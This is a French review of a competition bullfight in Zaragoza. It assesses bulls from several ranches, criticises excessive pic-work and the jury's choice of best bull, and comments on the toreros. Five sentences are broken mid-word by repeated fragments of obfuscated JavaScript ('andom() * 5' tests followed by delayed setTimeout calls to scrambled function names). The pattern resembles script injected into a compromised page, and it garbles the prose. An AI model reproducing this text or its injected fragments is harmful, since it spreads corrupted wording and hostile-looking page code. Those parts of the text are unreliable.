REFLEXIONS APRES LA CORRIDA CONCOURS DE SARAGOSSE

La corrida concours est considérée dans beaucoup d’arènes, sans qu’on le dise, comme un spectacle mineur, du remplissage à peu de frais et qui contente en principe une minorité de public toriste. Les ganaderos, habituellement, n’y présentent pas le meilleur de leur élevage, c’est souvent le contraire, car il s’agit de toros qu’ils n’ont pas pu caser dans leurs lots de toute la saison. Sauf s’il s’agit d’élevages peu programmés et souvent considérés comme durs ou si la corrida pour les ganaderos, l’impresario et le public revêt une importance particulière.

Ce qui fut le cas à Saragosse. On y vit une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande variété d’encastes, sérieux et impeccables de présentation les toros, avec la morphologie caractéristique de chaque fer et au comportement vraiment intéressant.

On privilégia en excès le tiers de piques qui est évidemment important dans ce genre de spectacle mais aussi dans toutes les corridas, or quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and le châtiment empêche la lidia à la muleta cela porte préjudice au toreo mais également au toro qui ne parvient pas aller jusqu’au bout.

Cela est arrivé par exemple à un toro très brave et avec beaucoup de classe d’Alcurrucén qui se vida au cheval après quatre piques. Ce fut vraiment dommage, car la lidia c’est aussi savoir mesurer le châtiment pour pouvoir observer un toro sous toutes ses facettes. Quatre piques de celles d’aujourd’hui est quelque chose de démesuré pour un toro brave. Il est vrai que c’est un spectacle de le voir charger de loin mais il faut aussi savoir analyser son combat au cheval. Il ne suffit pas qu’il galope, s’il racle longtemps le sol avant de s’élancer, s’il charge avec la tête haute on ne peut pas dire que ce soit un toro extrêmement brave.

Il arriva quelque chose de semblable au Cuadri qui se comporta ainsi au cheval et le jury lui décerna, à mon avis injustement, le prix au meilleur toro de cette corrida. Celui qui l’aurait mérité fut le cinquième, de Fuente Ymbro, imposant de présentation, fier et brave à la cape, il se livra à fond au cheval et malgré de sévères piques, il transmit beaucoup d’émotion jusqu’à n’en plus pouvoir. Un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and toro, un exemple, un étendard de la bravoure. Javier Castaño lui fit une faena rythmée mais en dessous de la qualité du toro. Celui-ci aurait mérité un tour de piste posthume même s’il décrocha à la fin de la faena après avoir tout donné.

J’ai beaucoup aimé aussi le toro de Zalduendo qui passa en premier, avec beaucoup de mobilité et d’allégresse. Il n’était pas facile à toréer car il regorgeait de caste. Il fut lidié avec fermeté et assurance par Antonio Ferrera qui l’acheva d’une bonne estocade mais le public, très froid, ne lui demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda même pas l’oreille. Par contre ils ne furent pas indifférents à la bravoure du toro. Un autre toro de qualité fut celui d’Adolfo Martín avec ces charges par le bas caractéristiques de la maison mais malheureusement il lui manque du carburant. Les toros restants furent moins intéressants.

En somme ce fut une corrida plaisante pour le public, avec une bonne entrée, mais où il y eut certains excès et le plus notoire c’est que si vraiment le toro est le protagoniste il ne faut pas l’achever à la pique.

Les commentaires sont fermés.